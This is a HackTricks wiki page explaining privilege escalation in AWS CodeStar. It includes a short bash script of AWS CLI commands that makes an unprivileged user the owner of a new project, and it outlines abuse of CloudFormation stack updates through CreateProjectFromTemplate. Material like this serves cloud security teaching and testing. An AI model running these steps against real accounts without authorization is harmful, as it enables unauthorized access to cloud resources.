# AWS - Codestar Privesc

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Codestar

You can find more information about codestar in:

{% content-ref url="codestar-createproject-codestar-associateteammember.md" %}
[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md)
{% endcontent-ref %}

### `iam:PassRole`, `codestar:CreateProject`

With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page:

{% content-ref url="iam-passrole-codestar-createproject.md" %}
[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md)
{% endcontent-ref %}

### `codestar:CreateProject`, `codestar:AssociateTeamMember`

This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.

```bash
PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
    --name $PROJECT_NAME \
    --id $PROJECT_NAME 

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
    --project-id $PROJECT_NAME \
    --user-arn "$USER_ARN" \
    --project-role "Owner" \
    --remote-access-allowed
```

If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`

**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in:

{% content-ref url="codestar-createproject-codestar-associateteammember.md" %}
[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md)
{% endcontent-ref %}

### `codestar:CreateProjectFromTemplate`

1. **Create a New Project:**
   * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
     * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
     * This access specifically targets a stack associated with the `CodeStarWorker-<generic project name>-CloudFormation` IAM role.
2. **Update the Target Stack:**
   * With the granted CloudFormation permissions, proceed to update the specified stack.
     * The stack's name will typically conform to one of two patterns:
       * `awscodestar-<generic project name>-infrastructure`
       * `awscodestar-<generic project name>-lambda`
       * The exact name depends on the chosen template (referencing the example exploit script).
3. **Access and Permissions:**
   * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
   * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.

For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)

**Potential Impact:** Privesc to cloudformation IAM role.

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}